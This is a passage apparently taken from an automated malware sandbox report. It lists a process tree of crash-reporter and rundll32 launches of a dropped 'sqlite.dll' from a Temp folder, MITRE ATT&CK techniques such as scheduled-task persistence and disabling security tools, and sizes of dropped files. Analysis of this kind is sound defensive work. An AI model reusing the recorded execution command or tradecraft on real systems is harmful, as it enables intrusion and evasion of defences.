C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 10004 -ip 100041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9944 -ip 99441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 508 -p 6000 -ip 60001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8732 -ip 87321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6048 -ip 60481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7248 -ip 72481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 11560 -ip 115601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9344 -s 4683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 9344 -ip 93441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 4483⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7692 -ip 76921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6576 -ip 65761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 9156 -ip 91561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 6472 -ip 64721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6372 -ip 63721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
1Hidden Files and Directories
1Install Root Certificate
1Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
164KB
-
Filesize
1.3MB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
152KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
296KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
1.4MB
-
Filesize
1.3MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
3.3MB
-
Filesize
68KB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
68KB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
12KB
-
Filesize
164KB
-
Filesize
144KB
-
Filesize
3.3MB
-
Filesize
436KB
-
Filesize
8KB